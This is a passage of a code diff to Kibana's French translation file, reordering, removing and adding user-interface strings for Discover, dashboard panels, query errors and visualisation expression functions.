 "discover.uninitializedRefreshButtonText": "Actualiser les données",
 "discover.uninitializedText": "Saisissez une requête, ajoutez quelques filtres, ou cliquez simplement sur Actualiser afin d’extraire les résultats pour la requête en cours.",
 "discover.uninitializedTitle": "Commencer la recherche",
- "discover.utils.formatHit.moreFields": "et {count} {count, plural, one {autre champ} other {autres champs}}",
- "discover.valueIsNotConfiguredDataViewIDWarningTitle": "{stateVal} n'est pas un ID de vue de données configuré",
 "discover.viewAlert.alertRuleChangedWarnDescription": "Les documents affichés peuvent ne pas correspondre à ceux ayant déclenché l'alerte\n car la configuration de la règle a été modifiée.",
 "discover.viewAlert.alertRuleChangedWarnTitle": "La règle d'alerte a été modifiée",
 "discover.viewAlert.alertRuleFetchErrorTitle": "Erreur lors de la récupération de la règle d'alerte",
+ "discover.viewAlert.dataViewChangedWarnDescription": "La vue de données a été mise à jour après la dernière mise à jour de la règle d'alerte.",
+ "discover.viewAlert.dataViewChangedWarnTitle": "La vue de données a changé",
 "discover.viewAlert.dataViewErrorTitle": "Erreur lors de la récupération de la vue de données",
 "discover.viewAlert.documentsMayVaryInfoDescription": "Les documents affichés peuvent différer de ceux ayant 
déclenché l'alerte.\n Des documents ont peut-être été ajoutés ou supprimés.",
 "discover.viewAlert.documentsMayVaryInfoTitle": "Les documents affichés peuvent varier",
@@ -3227,12 +2344,18 @@
 "discover.viewModes.fieldStatistics.betaTitle": "Bêta",
 "discover.viewModes.fieldStatistics.label": "Statistiques de champ",
 "discover.viewModes.legend": "Modes d'affichage",
+ "embeddableApi.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.",
+ "embeddableApi.attributeService.saveToLibraryError": "Une erreur s'est produite lors de l'enregistrement. Erreur : {errorMessage}.",
+ "embeddableApi.errors.embeddableFactoryNotFound": "Impossible de charger {type}. Veuillez effectuer une mise à niveau vers la distribution par défaut d'Elasticsearch et de Kibana avec la licence appropriée.",
+ "embeddableApi.panel.editPanel.displayName": "Modifier {value}",
+ "embeddableApi.panel.editTitleAriaLabel": "Cliquez pour modifier le titre : {title}",
+ "embeddableApi.panel.enhancedDashboardPanelAriaLabel": "Panneau du tableau de bord : {title}",
+ "embeddableApi.panel.optionsMenu.panelOptionsButtonAriaLabelWithIndex": "Options pour le panneau {index}",
+ "embeddableApi.panel.optionsMenu.panelOptionsButtonEnhancedAriaLabel": "Options de panneau pour {title}",
 "embeddableApi.addPanel.createNewDefaultOption": "Créer",
 "embeddableApi.addPanel.displayName": "Ajouter un panneau",
 "embeddableApi.addPanel.noMatchingObjectsMessage": "Aucun objet correspondant trouvé.",
- "embeddableApi.addPanel.savedObjectAddedToContainerSuccessMessageTitle": "{savedObjectName} a été ajouté.",
 "embeddableApi.addPanel.Title": "Ajouter depuis la bibliothèque",
- "embeddableApi.attributeService.saveToLibraryError": "Une erreur s'est produite lors de l'enregistrement. Erreur : {errorMessage}",
 "embeddableApi.contextMenuTrigger.description": "Un menu contextuel cliquable dans l’angle supérieur droit du panneau.",
 "embeddableApi.contextMenuTrigger.title": "Menu contextuel",
 "embeddableApi.customizePanel.action.displayName": "Modifier le titre du panneau",
@@ -3245,18 +2368,13 @@
 "embeddableApi.customizeTitle.optionsMenuForm.panelTitleFormRowLabel": "Titre du panneau",
 "embeddableApi.customizeTitle.optionsMenuForm.panelTitleInputAriaLabel": "Les modifications apportées à cette entrée sont appliquées immédiatement. Appuyez sur Entrée pour quitter.",
 "embeddableApi.customizeTitle.optionsMenuForm.resetCustomDashboardButtonLabel": "Réinitialiser le titre",
- "embeddableApi.errors.embeddableFactoryNotFound": "Impossible de charger {type}. Veuillez effectuer une mise à niveau vers la distribution par défaut d'Elasticsearch et de Kibana avec la licence appropriée.",
 "embeddableApi.errors.paneldoesNotExist": "Panneau introuvable",
 "embeddableApi.helloworld.displayName": "bonjour",
 "embeddableApi.panel.dashboardPanelAriaLabel": "Panneau du tableau de bord",
- "embeddableApi.panel.editPanel.displayName": "Modifier {value}",
- "embeddableApi.panel.editTitleAriaLabel": "Cliquez pour modifier le titre : {title}",
- "embeddableApi.panel.enhancedDashboardPanelAriaLabel": "Panneau du tableau de bord : {title}",
+ "embeddableApi.panel.errorEmbeddable.message": "Une erreur s'est produite. En savoir plus",
 "embeddableApi.panel.inspectPanel.displayName": "Inspecter",
 "embeddableApi.panel.inspectPanel.untitledEmbeddableFilename": "sans titre",
 "embeddableApi.panel.optionsMenu.panelOptionsButtonAriaLabel": "Options de panneau",
- "embeddableApi.panel.optionsMenu.panelOptionsButtonAriaLabelWithIndex": "Options pour le panneau {index}",
- "embeddableApi.panel.optionsMenu.panelOptionsButtonEnhancedAriaLabel": "Options de panneau pour {title}",
 "embeddableApi.panel.placeholderTitle": "[Aucun titre]",
 "embeddableApi.panel.removePanel.displayName": "Supprimer du tableau de bord",
 "embeddableApi.panelBadgeTrigger.description": "Des actions apparaissent dans la barre de titre lorsqu'un élément pouvant être intégré est chargé dans un panneau.",
@@ -3270,12 +2388,14 @@
 "embeddableApi.selectRangeTrigger.title": "Sélection de la plage",
 "embeddableApi.valueClickTrigger.description": "Un point de données cliquable sur la visualisation",
 "embeddableApi.valueClickTrigger.title": "Clic unique",
+ "esQuery.kql.errors.syntaxError": "{expectedList} attendu, mais {foundInput} détecté.",
 "esQuery.kql.errors.endOfInputText": "fin de l'entrée",
 "esQuery.kql.errors.fieldNameText": "nom du champ",
 "esQuery.kql.errors.literalText": "littéral",
- "esQuery.kql.errors.syntaxError": "{expectedList} attendu, mais {foundInput} détecté.",
 "esQuery.kql.errors.valueText": "valeur",
 "esQuery.kql.errors.whitespaceText": "espace",
+ "esUi.forms.fieldValidation.indexNameInvalidCharactersError": "Le nom de l'index contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.",
+ "esUi.forms.fieldValidation.indexPatternInvalidCharactersError": "Le modèle d'indexation contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.",
 "esUi.cronEditor.cronDaily.fieldHour.textAtLabel": "À",
 "esUi.cronEditor.cronDaily.fieldTimeLabel": "Heure",
 "esUi.cronEditor.cronDaily.hourSelectLabel": "Heure",
@@ -3324,10 +2444,8 @@
 "esUi.cronEditor.month.september": "septembre",
 "esUi.cronEditor.textEveryLabel": "Chaque",
 "esUi.forms.comboBoxField.placeHolderText": "Saisir, puis appuyer sur \"ENTRÉE\"",
- "esUi.forms.fieldValidation.indexNameInvalidCharactersError": "Le nom de l'index contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.",
 "esUi.forms.fieldValidation.indexNameSpacesError": "Le nom de l'index ne peut pas contenir d'espaces.",
- "esUi.forms.fieldValidation.indexNameStartsWithDotError": "Le nom de l'index ne peut pas commencer par un point (.).",
- "esUi.forms.fieldValidation.indexPatternInvalidCharactersError": "Le modèle d'indexation contient {characterListLength, plural, one {le caractère non valide} other {les caractères non valides}} {characterList}.",
+ "esUi.forms.fieldValidation.indexNameStartsWithDotError": "Le nom de l'index ne peut pas commencer par un point (.).",
 "esUi.forms.fieldValidation.indexPatternSpacesError": "Le modèle d'indexation ne peut pas contenir d'espaces.",
 "esUi.formWizard.backButtonLabel": "Retour",
 "esUi.formWizard.nextButtonLabel": "Suivant",
@@ -3337,25 +2455,13 @@ "esUi.viewApiRequest.closeButtonLabel": "Fermer", "esUi.viewApiRequest.copyToClipboardButton": "Copier dans le presse-papiers", "esUi.viewApiRequest.openInConsoleButton": "Ouvrir dans la console", - "eventAnnotation.group.args.annotationConfigs": "Configurations d'annotations", - "eventAnnotation.group.description": "Groupe d'annotations d'événement", - "eventAnnotation.manualAnnotation.args.color": "Couleur de la ligne", - "eventAnnotation.manualAnnotation.args.endTime": "Horodatage de l'annotation de plage", - "eventAnnotation.manualAnnotation.args.icon": "Icône facultative utilisée pour les lignes d'annotation", - "eventAnnotation.manualAnnotation.args.isHidden": "Basculer pour masquer l'annotation", - "eventAnnotation.manualAnnotation.args.label": "Nom de l'annotation", - "eventAnnotation.manualAnnotation.args.lineStyle": "Style de la ligne d'annotation", - "eventAnnotation.manualAnnotation.args.lineWidth": "Largeur de la ligne d'annotation", - "eventAnnotation.manualAnnotation.args.textVisibility": "Visibilité de l'étiquette sur la ligne d'annotation", - "eventAnnotation.manualAnnotation.args.time": "Horodatage de l'annotation", - "eventAnnotation.manualAnnotation.defaultAnnotationLabel": "Événement", - "eventAnnotation.manualAnnotation.description": "Configurer l'annotation manuelle", - "expressionError.errorComponent.description": "Échec de l'expression avec le message :", - "expressionError.errorComponent.title": "Oups ! Échec de l'expression", - "expressionError.renderer.debug.displayName": "Débogage", - "expressionError.renderer.debug.helpDescription": "Présenter une sortie de débogage formatée {JSON}", + "expressionError.renderer.debug.helpDescription": "Générer un rendu de sortie de débogage au format {JSON}", + "expressionError.errorComponent.description": "Échec de l'expression avec le message :", + "expressionError.errorComponent.title": "Oups ! 
Échec de l'expression", + "expressionError.renderer.debug.displayName": "Déboguer", "expressionError.renderer.error.displayName": "Informations sur l'erreur", "expressionError.renderer.error.helpDescription": "Présenter les données de l'erreur d'une manière utile pour les utilisateurs", + "expressionGauge.functions.gauge.errors.centralMajorNotSupportedForShapeError": "Les champs \"centralMajor\" et \"centralMajorMode\" ne sont pas pris en charge par la forme \"{shape}\"", "expressionGauge.functions.gauge.args.centralMajor.help": "Spécifie la valeur centralMajor du graphique de jauge affiché dans le graphique.", "expressionGauge.functions.gauge.args.centralMajorMode.help": "Spécifie le mode de centralMajor", "expressionGauge.functions.gauge.args.colorMode.help": "Si la valeur est définie sur palette, les couleurs de celles-ci seront appliquées aux bandes", @@ -3370,7 +2476,6 @@ "expressionGauge.functions.gauge.args.palette.help": "Fournit des couleurs pour les valeurs", "expressionGauge.functions.gauge.args.shape.help": "Type de graphique de jauge", "expressionGauge.functions.gauge.args.ticksPosition.help": "Spécifie l'emplacement des coches", - "expressionGauge.functions.gauge.errors.centralMajorNotSupportedForShapeError": "Les champs \"centralMajor\" et \"centralMajorMode\" ne sont pas pris en charge par la forme \"{shape}\"", "expressionGauge.functions.gauge.help": "Visualisation de la jauge", "expressionGauge.functions.gauge.percentageMode.help": "Active le mode de pourcentage relatif", "expressionGauge.functions.gauge.respectRanges.help": "Respecter les valeurs max. et min. des plages", 
@@ -3382,62 +2487,41 @@ "expressionGauge.renderer.chartCannotRenderEqual": "Les valeurs minimale et maximale ne peuvent pas être égales.", "expressionGauge.renderer.chartCannotRenderMinGreaterMax": "La valeur minimale ne peut pas être supérieure à la valeur maximale.", "expressionGauge.renderer.visualizationName": "Jauge", - "expressionHeatmap.function.args.addTooltipHelpText": "Afficher l'infobulle au survol", - "expressionHeatmap.function.args.grid.isCellLabelVisible.help": "Spécifie si l'étiquette de cellule est visible ou non.", - "expressionHeatmap.function.args.grid.isXAxisLabelVisible.help": "Spécifie si les étiquettes de l'axe X sont visibles ou non.", - "expressionHeatmap.function.args.grid.isXAxisTitleVisible.help": "Spécifie si le titre de l'axe X est visible ou non.", - "expressionHeatmap.function.args.grid.isYAxisLabelVisible.help": "Spécifie si les étiquettes de l'axe Y sont visibles ou non.", - "expressionHeatmap.function.args.grid.isYAxisTitleVisible.help": "Spécifie si le titre de l'axe Y est visible ou non.", - "expressionHeatmap.function.args.grid.strokeColor.help": "Spécifie la couleur de trait de la grille", - "expressionHeatmap.function.args.grid.strokeWidth.help": "Spécifie la largeur de trait de la grille", - "expressionHeatmap.function.args.grid.xTitle.help": "Spécifie le titre de l'axe X", - "expressionHeatmap.function.args.grid.yTitle.help": "Spécifie le titre de l'axe Y", - "expressionHeatmap.function.args.highlightInHoverHelpText": "Cette option permet de mettre en surbrillance les plages de la même couleur sur le survol de la légende", - "expressionHeatmap.function.args.lastRangeIsRightOpen": "Si elle est définie comme vraie, la dernière valeur de la gamme sera grande ouverte", - "expressionHeatmap.function.args.legend.isVisible.help": "Spécifie si la légende est visible ou non.", - "expressionHeatmap.function.args.legend.maxLines.help": "Spécifie le nombre de lignes par élément de légende.", - 
"expressionHeatmap.function.args.legend.position.help": "Spécifie la position de la légende.", - "expressionHeatmap.function.args.legend.shouldTruncate.help": "Spécifie si les éléments de légende doivent être tronqués ou non.", - "expressionHeatmap.function.args.legendSize.help": "Spécifie la taille de la légende.", - "expressionHeatmap.function.args.splitColumnAccessorHelpText": "L'identifiant de la colonne fractionnée ou la dimension correspondante", - "expressionHeatmap.function.args.splitRowAccessorHelpText": "L'identifiant de la ligne fractionnée ou la dimension correspondante", - "expressionHeatmap.function.args.valueAccessorHelpText": "l'identifiant de la colonne de valeurs ou la dimension correspondante", - "expressionHeatmap.function.args.xAccessorHelpText": "l'identifiant de la colonne de l'axe X ou la dimension correspondante", - "expressionHeatmap.function.args.yAccessorHelpText": "l'identifiant de la colonne de l'axe Y ou la dimension correspondante", - "expressionHeatmap.function.dimension.metric": "Indicateur", - "expressionHeatmap.function.dimension.splitColumn": "Diviser par colonne", - "expressionHeatmap.function.dimension.splitRow": "Diviser par ligne", - "expressionHeatmap.function.dimension.xaxis": "Axe X", - "expressionHeatmap.function.dimension.yaxis": "Axe Y", - "expressionHeatmap.function.gridConfig.help": "Configurez la disposition de la carte thermique.", - "expressionHeatmap.function.help": "Visualisation de la carte thermique", - "expressionHeatmap.function.legendConfig.help": "Configurez la légende du graphique.", - "expressionHeatmap.function.palette.help": "Fournit des couleurs pour les valeurs, basées sur les limites.", - "expressionHeatmap.function.percentageMode.help": "Lorsque cette option est activée, l'infobulle et les légendes apparaissent sous forme de pourcentages.", - "expressionHeatmap.functions.args.ariaLabelHelpText": "Spécifie l'attribut aria-label de la carte thermique.", - "expressionHeatmap.visualizationName": "Carte 
thermique", "expressionImage.functions.image.args.dataurlHelpText": "L'{URL} {https} ou l'{URL} de données {BASE64} d'une image.", - "expressionImage.functions.image.args.modeHelpText": "{contain} affiche l'image entière, mise à l’échelle. {cover} remplit le conteneur avec l'image, en rognant les côtés ou le bas si besoin. {stretch} redimensionne la hauteur et la largeur de l'image pour correspondre à 100 % du conteneur.", + "expressionImage.functions.image.args.modeHelpText": "{contain} affiche l'image entière, mise à l’échelle. {cover} remplit le conteneur avec l'image, en rognant les côtés ou le bas si besoin. {stretch} redimensionne la hauteur et la largeur de l'image pour correspondre à 100 % du conteneur.", "expressionImage.functions.image.invalidImageModeErrorMessage": "\"mode\" doit être défini sur \"{contain}\", \"{cover}\" ou \"{stretch}\".", "expressionImage.functions.imageHelpText": "Affiche une image. Spécifiez une ressource d'image sous la forme d'une {URL} de données {BASE64}, ou saisissez une sous-expression.", "expressionImage.renderer.image.displayName": "Image", "expressionImage.renderer.image.helpDescription": "Présenter une image", "expressionMetric.functions.metric.args.labelFontHelpText": "Les propriétés de la police {CSS} pour l'étiquette. Par exemple, {FONT_FAMILY} ou {FONT_WEIGHT}.", - "expressionMetric.functions.metric.args.labelHelpText": "Le texte décrivant l'indicateur.", "expressionMetric.functions.metric.args.metricFontHelpText": "Les propriétés de la police {CSS} pour l'indicateur. Par exemple, {FONT_FAMILY} ou {FONT_WEIGHT}.", "expressionMetric.functions.metric.args.metricFormatHelpText": "Une chaîne de format {NUMERALJS}. 
Par exemple, {example1} ou {example2}.", + "expressionMetric.functions.metric.args.labelHelpText": "Le texte décrivant l'indicateur.", "expressionMetric.functions.metricHelpText": "Affiche un nombre sur une étiquette.", "expressionMetric.renderer.metric.displayName": "Indicateur", "expressionMetric.renderer.metric.helpDescription": "Présenter un nombre sur une étiquette", + "expressionMetricVis.errors.unsupportedColumnFormat": "Expression de visualisation de l'indicateur - Format de colonne non pris en charge : \"{id}\"", + "expressionMetricVis.function.breakdownBy.help": "La dimension contenant les étiquettes des sous-catégories.", + "expressionMetricVis.function.color.help": "Fournit une couleur de visualisation statique. Remplacé par la palette.", + "expressionMetricVis.function.dimension.maximum": "Maximum", "expressionMetricVis.function.dimension.metric": "Indicateur", + "expressionMetricVis.function.dimension.secondaryMetric": "Indicateur secondaire", "expressionMetricVis.function.dimension.splitGroup": "Diviser le groupe", "expressionMetricVis.function.help": "Visualisation de l'indicateur", - "expressionMetricVis.function.metric.help": "configuration des dimensions d’indicateur", + "expressionMetricVis.function.max.help.": "La dimension contenant la valeur maximale.", + "expressionMetricVis.function.metric.help": "L’indicateur principal.", + "expressionMetricVis.function.minTiles.help": "Spécifie le nombre minimum de tuiles dans la grille d’indicateur, quelles que soient les données d'entrée.", + "expressionMetricVis.function.numCols.help": "Spécifie le nombre maximum de colonnes dans la grille d’indicateur.", "expressionMetricVis.function.palette.help": "Fournit des couleurs pour les valeurs, basées sur les limites.", - "expressionPartitionVis.legend.filterForValueButtonAriaLabel": "Filtrer sur la valeur", + "expressionMetricVis.function.progressDirection.help": "La direction dans laquelle la barre de progression doit croître.", + 
"expressionMetricVis.function.secondaryMetric.help": "L’indicateur secondaire (affiché au-dessus de l’indicateur principal).", + "expressionMetricVis.function.secondaryPrefix.help": "Texte facultatif à afficher avant secondaryMetric.", + "expressionMetricVis.function.subtitle.help": "Le sous-titre pour un indicateur unique. Remplacé si breakdownBy est spécifié.", "expressionPartitionVis.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "expressionPartitionVis.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "expressionPartitionVis.negativeValuesFound": "Le graphique {chartType} ne peut pas rendre des valeurs négatives.", + "expressionPartitionVis.reusable.function.errors.moreThenNumberBuckets": "Les compartiments de plus de {maxLength} ne sont pas pris en charge.", + "expressionPartitionVis.legend.filterForValueButtonAriaLabel": "Filtrer sur la valeur", + "expressionPartitionVis.legend.filterOutValueButtonAriaLabel": "Exclure la valeur", "expressionPartitionVis.partitionLabels.function.args.last_level.help": "Afficher les étiquettes de niveau supérieur uniquement pour les camemberts/graphiques en anneau", "expressionPartitionVis.partitionLabels.function.args.percentDecimals.help": "Définit le nombre de décimales qui s'affichent pour les valeurs sous forme de pourcentage.", "expressionPartitionVis.partitionLabels.function.args.position.help": "Définit la position des étiquettes.", 
@@ -3471,7 +2555,6 @@ "expressionPartitionVis.reusable.function.dimension.metric": "Taille de section", "expressionPartitionVis.reusable.function.dimension.splitcolumn": "Division de colonne", "expressionPartitionVis.reusable.function.dimension.splitrow": "Division de ligne", - "expressionPartitionVis.reusable.function.errors.moreThenNumberBuckets": "Les compartiments de plus de {maxLength} ne sont pas pris en charge.", "expressionPartitionVis.reusable.function.errors.splitRowAndColumnSpecified": "Une ligne fractionnée et une colonne sont spécifiées. l'expression n'en prend en charge qu’une à la fois.", "expressionPartitionVis.reusable.functions.args.ariaLabelHelpText": "Spécifie l'attribut aria-label du graphique.", "expressionPartitionVis.waffle.function.args.bucketHelpText": "Configuration des dimensions de compartiment", 
@@ -3487,18 +2570,31 @@ "expressionRevealImage.functions.revealImage.args.emptyImageHelpText": "Une image d'arrière-plan facultative à révéler. Spécifiez une ressource d'image sous la forme d’une {URL} de données \"{BASE64}\", ou saisissez une sous-expression.", "expressionRevealImage.functions.revealImage.args.imageHelpText": "L'image à révéler. Spécifiez une ressource d'image sous la forme d'une {URL} de données {BASE64}, ou saisissez une sous-expression.", "expressionRevealImage.functions.revealImage.args.originHelpText": "La position à laquelle démarrer le remplissage de l'image. Par exemple, {list} ou {end}.", - "expressionRevealImage.functions.revealImage.invalidImageUrl": "URL d'image non valide : \"{imageUrl}\".", - "expressionRevealImage.functions.revealImage.invalidPercentErrorMessage": "Valeur non valide : \"{percent}\". Le pourcentage doit être compris entre 0 et 1.", + "expressionRevealImage.functions.revealImage.invalidImageUrl": "URL d'image non valide : \"{imageUrl}\".", + "expressionRevealImage.functions.revealImage.invalidPercentErrorMessage": "Valeur non valide : \"{percent}\". Le pourcentage doit être compris entre 0 et 1.", "expressionRevealImage.functions.revealImageHelpText": "Configure un élément de révélation d'image.", "expressionRevealImage.renderer.revealImage.displayName": "Révélation d'image", "expressionRevealImage.renderer.revealImage.helpDescription": "Révèle un pourcentage d'une image pour concevoir un graphique à jauge personnalisé.", + "expressions.execution.functionDisabled": "Fonction {fnName} désactivée.", + "expressions.execution.functionNotFound": "Fonction {fnName} introuvable.", + "expressions.functions.createTableHelpText": "Crée une table de données avec une liste de colonnes, et une ou plusieurs lignes vides. 
Pour générer les lignes, utilisez {mapColumnFn} ou {mathColumnFn}.", + "expressions.functions.font.args.familyHelpText": "Une chaîne de police Internet {css} acceptable", + "expressions.functions.font.args.weightHelpText": "L’épaisseur de la police. Par exemple, {list} ou {end}.", + "expressions.functions.mapColumn.args.expressionHelpText": "Une expression qui est exécutée sur chaque ligne, fournie avec un contexte {DATATABLE} de ligne unique et retournant la valeur de la cellule.", + "expressions.functions.mapColumnHelpText": "Ajoute une colonne calculée comme le résultat d'autres colonnes. Des modifications ne sont apportées que si des arguments sont fournis. Voir également {alterColumnFn} et {staticColumnFn}.", + "expressions.functions.math.args.expressionHelpText": "Une expression {TINYMATH} évaluée. Voir {TINYMATH_URL}.", + "expressions.functions.math.args.onErrorHelpText": "Si l’évaluation {TINYMATH} échoue ou renvoie NaN, la valeur de retour est spécifiée par onError. Lors de la ''génération'', une exception est levée, terminant l'exécution de l'expression (par défaut).", + "expressions.functions.math.tooManyResultsErrorMessage": "Les expressions doivent retourner un nombre unique. Essayez d'englober votre expression dans {mean} ou {sum}.", + "expressions.functions.mathColumn.arrayValueError": "Impossible de réaliser le calcul sur les valeurs du tableau à {name}", + "expressions.functions.mathColumnHelpText": "Ajoute une colonne en évaluant {tinymath} sur chaque ligne. Cette fonction est optimisée pour les mathématiques et livre de meilleures performances par rapport à l'utilisation d'une expression mathématique dans {mapColumnFn}.", + "expressions.functions.mathHelpText": "Interprète une expression mathématique {TINYMATH} à l'aide d'un {TYPE_NUMBER} ou d'une {DATATABLE} en tant que {CONTEXT}. Les colonnes {DATATABLE} peuvent être recherchées d’après leur nom. 
Si {CONTEXT} est un nombre, il est disponible en tant que {value}.", + "expressions.functions.seriesCalculations.columnConflictMessage": "L'ID de colonne de sortie {columnId} existe déjà. Veuillez choisir un autre ID de colonne.", + "expressions.functions.uiSetting.error.parameter": "Paramètre \"{parameter}\" non valide.", + "expressions.types.number.fromStringConversionErrorMessage": "Impossible de cataloguer la chaîne \"{string}\" en nombre", "expressions.defaultErrorRenderer.errorTitle": "Erreur dans la visualisation", - "expressions.execution.functionDisabled": "Fonction {fnName} désactivée.", - "expressions.execution.functionNotFound": "Fonction {fnName} introuvable.", "expressions.functions.createTable.args.idsHelpText": "ID de colonne à générer dans l'ordre de position. L'ID représente la clé dans la ligne.", "expressions.functions.createTable.args.nameHelpText": "Noms de colonne à générer dans l'ordre de position. Ces noms n'ont pas besoin d'être uniques et, en l’absence de noms, les ID sont utilisés par défaut.", "expressions.functions.createTable.args.rowCountText": "Le nombre de lignes vides à ajouter au tableau, pour y attribuer une valeur plus tard", - "expressions.functions.createTableHelpText": "Crée une table de données avec une liste de colonnes, et une ou plusieurs lignes vides. Pour générer les lignes, utilisez {mapColumnFn} ou {mathColumnFn}.", "expressions.functions.cumulativeSum.args.byHelpText": "Colonne par laquelle diviser le calcul de la somme cumulée", "expressions.functions.cumulativeSum.args.inputColumnIdHelpText": "Colonne pour laquelle calculer la somme cumulée", "expressions.functions.cumulativeSum.args.outputColumnIdHelpText": "Colonne dans laquelle stocker le résultat de la somme cumulée", 
@@ -3511,35 +2607,25 @@ "expressions.functions.derivative.help": "Calcule la dérivée d'une colonne dans un tableau de données.", "expressions.functions.font.args.alignHelpText": "L'alignement horizontal du texte.", "expressions.functions.font.args.colorHelpText": "La couleur du texte.", - "expressions.functions.font.args.familyHelpText": "Une chaîne de police Internet {css} acceptable", - "expressions.functions.font.args.italicHelpText": "Mettre le texte en italique ?", + "expressions.functions.font.args.italicHelpText": "Mettre le texte en italique ?", "expressions.functions.font.args.lHeightHelpText": "La hauteur de la ligne en pixels", "expressions.functions.font.args.sizeHelpText": "La taille de la police", "expressions.functions.font.args.sizeUnitHelpText": "l'unité de la taille de la police", - "expressions.functions.font.args.underlineHelpText": "Souligner le texte ?", - "expressions.functions.font.args.weightHelpText": "L’épaisseur de la police. Par exemple, {list} ou {end}.", - "expressions.functions.font.invalidFontWeightErrorMessage": "Épaisseur de police non valide : \"{weight}\"", - "expressions.functions.font.invalidSizeUnitErrorMessage": "Unité de taille non valide : \"{sizeUnit}\"", - "expressions.functions.font.invalidTextAlignmentErrorMessage": "Alignement du texte non valide : \"{align}\"", + "expressions.functions.font.args.underlineHelpText": "Souligner le texte ?", + "expressions.functions.font.invalidFontWeightErrorMessage": "Épaisseur de police non valide : \"{weight}\"", + "expressions.functions.font.invalidSizeUnitErrorMessage": "Unité de taille non valide : \"{sizeUnit}\"", + "expressions.functions.font.invalidTextAlignmentErrorMessage": "Alignement du texte non valide : \"{align}\"", "expressions.functions.fontHelpText": "Créez un style de police.", "expressions.functions.mapColumn.args.copyMetaFromHelpText": "Si défini, l'objet méta de l'ID de colonne spécifié est copié dans la colonne cible spécifiée. 
Si la colonne n'existe pas, un échec silencieux se produit.", - "expressions.functions.mapColumn.args.expressionHelpText": "Une expression qui est exécutée sur chaque ligne, fournie avec un contexte {DATATABLE} de ligne unique et retournant la valeur de la cellule.", "expressions.functions.mapColumn.args.idHelpText": "Un ID facultatif de la colonne de résultat. Si aucun ID n'est fourni, l'ID est récupéré de la colonne existante par l'argument de nom fourni. S'il n'existe pas encore de colonne à ce nom, une nouvelle colonne avec ce nom et un ID identique est ajoutée au tableau.", "expressions.functions.mapColumn.args.nameHelpText": "Le nom de la colonne produite. Les noms n'ont pas besoin d'être uniques.", - "expressions.functions.mapColumnHelpText": "Ajoute une colonne calculée comme le résultat d'autres colonnes. Des modifications ne sont apportées que si des arguments sont fournis. Voir également {alterColumnFn} et {staticColumnFn}.", - "expressions.functions.math.args.expressionHelpText": "Une expression {TINYMATH} évaluée. Voir {TINYMATH_URL}.", - "expressions.functions.math.args.onErrorHelpText": "Si l’évaluation {TINYMATH} échoue ou renvoie NaN, la valeur de retour est spécifiée par onError. Lors de la ''génération'', une exception est levée, terminant l'exécution de l'expression (par défaut).", "expressions.functions.math.emptyDatatableErrorMessage": "Table de données vide", "expressions.functions.math.emptyExpressionErrorMessage": "Expression vide", "expressions.functions.math.executionFailedErrorMessage": "Échec d'exécution de l'expression mathématique. Vérifiez les noms des colonnes.", - "expressions.functions.math.tooManyResultsErrorMessage": "Les expressions doivent retourner un nombre unique. Essayez d'englober votre expression dans {mean} ou {sum}.", "expressions.functions.mathColumn.args.copyMetaFromHelpText": "Si défini, l'objet méta de l'ID de colonne spécifié est copié dans la colonne cible spécifiée. 
Si la colonne n'existe pas, un échec silencieux se produit.", "expressions.functions.mathColumn.args.idHelpText": "ID de la colonne produite. Doit être unique.", "expressions.functions.mathColumn.args.nameHelpText": "Le nom de la colonne produite. Les noms n'ont pas besoin d'être uniques.", - "expressions.functions.mathColumn.arrayValueError": "Impossible de réaliser le calcul sur les valeurs du tableau à {name}", "expressions.functions.mathColumn.uniqueIdError": "L'ID doit être unique.", - "expressions.functions.mathColumnHelpText": "Ajoute une colonne en évaluant {tinymath} sur chaque ligne. Cette fonction est optimisée pour les mathématiques et livre de meilleures performances par rapport à l'utilisation d'une expression mathématique dans {mapColumnFn}.", - "expressions.functions.mathHelpText": "Interprète une expression mathématique {TINYMATH} à l'aide d'un {TYPE_NUMBER} ou d'une {DATATABLE} en tant que {CONTEXT}. Les colonnes {DATATABLE} peuvent être recherchées d’après leur nom. Si {CONTEXT} est un nombre, il est disponible en tant que {value}.", "expressions.functions.movingAverage.args.byHelpText": "Colonne par laquelle diviser le calcul de la moyenne mobile", "expressions.functions.movingAverage.args.inputColumnIdHelpText": "Colonne pour laquelle calculer la moyenne mobile", "expressions.functions.movingAverage.args.outputColumnIdHelpText": "Colonne dans laquelle stocker le résultat de la moyenne mobile", 
@@ -3552,88 +2638,99 @@ "expressions.functions.overallMetric.args.outputColumnNameHelpText": "Nom de la colonne dans laquelle stocker le résultat de l’indicateur général", "expressions.functions.overallMetric.help": "Calcule la somme, le minimum, le maximum ou la moyenne générale d'une colonne dans un tableau de données.", "expressions.functions.overallMetric.metricHelpText": "Indicateur à calculer", - "expressions.functions.seriesCalculations.columnConflictMessage": "L'ID de colonne de sortie {columnId} existe déjà. Veuillez choisir un autre ID de colonne.", "expressions.functions.theme.args.defaultHelpText": "La valeur par défaut lorsqu’aucune information de thème n’est disponible.", "expressions.functions.theme.args.variableHelpText": "Nom de la variable de thème à lire.", "expressions.functions.themeHelpText": "Lit un paramètre de thème.", "expressions.functions.uiSetting.args.default": "La valeur par défaut utilisée lorsque le paramètre n’est pas défini.", "expressions.functions.uiSetting.args.parameter": "Le nom du paramètre.", "expressions.functions.uiSetting.error.kibanaRequest": "Une requête Kibana est nécessaire pour obtenir les paramètres de l'interface utilisateur sur le serveur. Veuillez fournir un objet de requête pour les paramètres d'exécution de l'expression.", - "expressions.functions.uiSetting.error.parameter": "Paramètre \"{parameter}\" non valide.", "expressions.functions.uiSetting.help": "Renvoie une valeur de paramètre de l'interface utilisateur.", "expressions.functions.var.help": "Met à jour le contexte général de Kibana.", "expressions.functions.var.name.help": "Spécifiez le nom de la variable.", "expressions.functions.varset.help": "Met à jour le contexte général de Kibana.", "expressions.functions.varset.name.help": "Spécifiez le nom de la variable.", "expressions.functions.varset.val.help": "Spécifiez la valeur de la variable. 
